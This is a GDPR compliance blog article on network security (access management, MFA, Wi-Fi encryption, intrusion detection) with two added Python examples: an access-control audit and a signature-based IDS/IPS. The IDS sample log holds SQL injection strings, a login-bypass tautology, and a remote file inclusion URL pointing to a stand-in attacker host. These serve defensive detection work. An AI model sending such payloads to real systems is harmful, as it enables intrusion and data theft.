We’re well into the second year of GDPR, and many companies are still not fully GDPR compliant. Many say they never will be. They simply can’t get there because it’s too complicated, disruptive or expensive.
Does full GDPR compliance even matter if your business takes data protection seriously and treats it with respect? After all, if you’re a small business with limited resources, won’t regulators take your circumstances into account if you suffer a data breach?
If you view GDPR as a framework for Getting Data Protection Right rather than a strict regime, it seems less daunting, less authoritarian. Adapting your organisation's mindset to this GDPR framework is as important as 100% compliance.
At PrivIQ, we’ve identified nine core elements of data protection. The first of these is accountability. This article discusses the second element: core policies which govern network security. Let’s look at them one by one.
1. Access Management
In 2018, there was a data breach at a Dutch hospital which led to a whopping €460,000 fine from GDPR authorities. This breach came about through inadequate security – over 200 staff “snooped” at the medical files of a reality TV celebrity!
Access management is about giving access only to people who need it and adding layers of security to prevent unnecessary access. It’s also about data minimisation and retention periods – two key principles of the GDPR. Companies should not hold more data than they need and must delete it when they no longer need it.
As part of an efficient data-security framework, you need an IAM (identity and access management) strategy. This might include password management tools, monitoring and reporting apps and role-based access control.
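As an added example (not PrivIQ's code or tooling), here is a small Python model of the IAM principles above, using constructed roles, patient assignments, an access log and retention periods: `is_allowed` combines role-based access control with a need-to-know check, `flag_snooping` is the audit over the access log that would surface the pattern behind the Haga Hospital breach, and `records_due_for_deletion` applies the retention principle.

```python
from collections import defaultdict
from datetime import date, timedelta

# Constructed policy for this example. Roles map to the record types they may read;
# ASSIGNMENTS captures need-to-know: which patients each staff member is currently treating.
ROLE_PERMISSIONS = {
    "clinician": {"medical_record", "contact_details"},
    "billing": {"invoice", "contact_details"},
    "reception": {"contact_details"},
}
RETENTION_DAYS = {"invoice": 365 * 7, "medical_record": 365 * 15, "contact_details": 365 * 2}
ASSIGNMENTS = {"s1": {"p100"}, "s2": {"p100", "p200"}, "s4": {"p200"}, "s5": {"p200"}}

# Constructed access log: (staff_id, patient_id, record_type) for every read that took place.
ACCESS_LOG = [
    ("s1", "p100", "medical_record"),   # assigned clinician, legitimate
    ("s3", "p100", "medical_record"),   # not assigned to p100
    ("s4", "p100", "medical_record"),   # not assigned to p100
    ("s5", "p100", "medical_record"),   # not assigned to p100
    ("s2", "p200", "medical_record"),   # assigned, legitimate
    ("s1", "p200", "contact_details"),  # not assigned, but an isolated read
]
# Constructed stored records: (record_id, record_type, created_on), audited on AUDIT_DATE.
SAMPLE_RECORDS = [("r1", "invoice", date(2010, 1, 1)), ("r2", "medical_record", date(2015, 6, 1)),
                  ("r3", "contact_details", date(2019, 1, 1))]
AUDIT_DATE = date(2019, 12, 1)

def is_allowed(role, record_type, staff_id, patient_id, assignments=ASSIGNMENTS):
    """Least-privilege check: the role must permit the record type AND the staff member
    must be assigned to the patient. A hospital-wide role alone is not enough."""
    return (record_type in ROLE_PERMISSIONS.get(role, set())
            and patient_id in assignments.get(staff_id, set()))

def flag_snooping(access_log, assignments=ASSIGNMENTS, threshold=3):
    """Accountability check over the access log: collect, per patient, the staff who read
    their records without being assigned to them, and report patients read by at least
    `threshold` such staff (the pattern behind the Haga Hospital breach)."""
    unassigned_readers = defaultdict(set)
    for staff_id, patient_id, _record_type in access_log:
        if patient_id not in assignments.get(staff_id, set()):
            unassigned_readers[patient_id].add(staff_id)
    return {p: sorted(s) for p, s in unassigned_readers.items() if len(s) >= threshold}

def records_due_for_deletion(records, today=AUDIT_DATE):
    """Retention check (data minimisation): ids of records held past their retention period."""
    return [rid for rid, rtype, created in records
            if created + timedelta(days=RETENTION_DAYS[rtype]) < today]
```

In a real deployment the access log would be written by the records system itself, and the snooping audit would run on a schedule and feed the accountability evidence GDPR expects.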
Multi-Factor Authentication
One way the Haga Hospital in the Netherlands failed their patient under GDPR was by allowing easy access to data by people who had no need for it. Multi-factor or two-factor authentication falls under the IAM umbrella. It ensures the person accessing the data is who they say they are by asking questions only they can answer.
An example of multi-factor authentication in everyday life is the personal questions you often must answer to access an online bank account. A person in a position of trust is unlikely to share such information within a business or organisation. Good access management ties in with accountability.
2. Network Component Security
Network component security is about making all the individual parts of a network safe. This includes all connected equipment, such as computers, servers, switches, access points and routers. Even the cables which connect these items can be a security threat if a hacker manages to detect emanations, meaning any type of signal, sound or vibration that might be emitted.
Network component security ties in with access management, since you need adequate user authentication on PCs to protect data being accessed by the wrong people.
Wireless Encryption
Wireless encryption prevents hackers from eavesdropping on the connection and accessing the network. There are various types of encryption:
- WEP (Wired Equivalent Privacy): easy to configure and widely supported but not entirely secure. Better than an open network, but an upgrade is advisable.
- WPA (Wi-Fi Protected Access): an improvement over WEP but still vulnerable to intrusion.
- WPA2 (Wi-Fi Protected Access II): the security protocol most used today, with a strong level of encryption. Still vulnerable to the KRACK attack.
- WPA3 (Wi-Fi Protected Access III): addresses the known KRACK vulnerability in WPA2 and prevents offline “dictionary attacks”. Most equipment will not yet support it though, as it’s too new.
Intrusion Detection
A third vital form of network security is an intrusion detection and prevention system (IDPS). This protects your network from some of the most common and damaging cyberattacks, such as those from all types of malware. That includes adware, spyware, rootkits, trojans and worms.
In 2019, a Verizon Data Breach Investigations Report found that 52% of analysed data breaches came from hacking. Second on the list at 33% was social engineering and phishing. This is where criminals extract sensitive information by manipulating individuals via email or phone. Phishing by phone is known as “vishing”. Malware came third at 28%.
Intrusion detection applications can detect and foil ongoing attacks such as those mentioned above as well as preventing some from occurring. It’s reactive and pre-emptive. For instance, it protects against SQL injections and remote file inclusions (RFIs). Either of these compromises data and can have disastrous consequences for a business.
A network-based intrusion prevention system blocks and stops malicious activity, logs information about it and reports it to security personnel. It monitors all incoming and outgoing traffic, analysing and comparing it to a library of known attacks or standard behavioural patterns.
IDPS vs IDS vs IPS
IDPS products combine IDS and IPS functionality (intrusion detection and prevention systems). An IDS only monitors activity and sends reports when it sees something suspicious. An IPS acts on suspicious activity. You can think of these as manual and automated responses. Within the IT industry, IPS and IDPS are more popular.
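An added example, not from the page or from any IDS product: a signature-based detector over constructed web-server access log lines, run first in IDS mode (report only) and then in IPS mode (drop the request and block the source), covering the SQL injection and remote file inclusion cases mentioned above. The signatures, the log format and the sample traffic are simplified assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Constructed signatures (not a real IDS ruleset), matched against the URL-decoded request path.
SIGNATURES = [
    ("sqli_union", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("sqli_tautology", re.compile(r"'\s*or\s+'?\d+'?\s*=\s*'?\d+", re.I)),
    ("rfi_remote_include", re.compile(r"[?&]\w+=(https?|ftp)://", re.I)),
]
# Apache/nginx-style access log line: client IP, timestamp, request line, status.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample traffic; 203.0.113.9 and 198.51.100.7 are documentation ranges, not real hosts.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Nov/2019:10:01:02 +0000] "GET /products?id=42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Nov/2019:10:01:05 +0000] "GET /products?id=42%20UNION%20SELECT%20username,password%20FROM%20users HTTP/1.1" 500 0',
    '203.0.113.9 - - [12/Nov/2019:10:01:07 +0000] "GET /login?user=admin%27%20OR%20%271%27=%271 HTTP/1.1" 200 1024',
    '198.51.100.7 - - [12/Nov/2019:10:02:00 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 300',
    '10.0.0.5 - - [12/Nov/2019:10:02:10 +0000] "GET /about HTTP/1.1" 200 2048',
]

def inspect(line):
    """Parse one log line and return {ip, path, hits}; hits lists the signature names matched."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    decoded = unquote(m.group("path"))   # decode %20 etc. so encoding does not evade the rules
    return {"ip": m.group("ip"), "path": decoded,
            "hits": [name for name, rx in SIGNATURES if rx.search(decoded)]}

def run_ids(lines):
    """IDS mode: monitor only. Returns alerts for review; nothing is blocked."""
    return [r for r in map(inspect, lines) if r is not None and r["hits"]]

def run_ips(lines, block_after=1):
    """IPS mode: act on suspicious activity. The offending request is dropped and, once a source
    has triggered `block_after` alerts, all its later traffic is dropped too (even benign requests,
    which is why IPS tuning matters). Returns (allowed_paths, blocked_ips)."""
    alerts_per_ip, blocked, allowed = {}, set(), []
    for r in map(inspect, lines):
        if r is None or r["ip"] in blocked:
            continue
        if r["hits"]:
            alerts_per_ip[r["ip"]] = alerts_per_ip.get(r["ip"], 0) + 1
            if alerts_per_ip[r["ip"]] >= block_after:
                blocked.add(r["ip"])
            continue
        allowed.append(r["path"])
    return allowed, blocked
```

Running `run_ids(SAMPLE_LOG)` yields three alerts for the same traffic that `run_ips(SAMPLE_LOG)` drops, while the two benign requests from 10.0.0.5 pass through either way.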
Documenting Security Measures
It’s vital for GDPR purposes that you record all the security measures you’ve taken to protect data. Do you have the above three criteria in place? Are your staff aware of them? In the event of a data breach, you’ll need to file a report to local regulators within 72 hours of its discovery. The report must detail the security measures you had in place at the time of the breach. The ideal place to record this is within the easy-to-use compliance tool of the PrivIQ software.
Other features of PrivIQ software, such as the data breach incident workflow, can be invaluable. You need to quickly determine whether you need to inform authorities based upon the likely impact of a breach and draft a report. This workflow can help. That said, having the three security elements cited above in place may stop you from even reaching that point.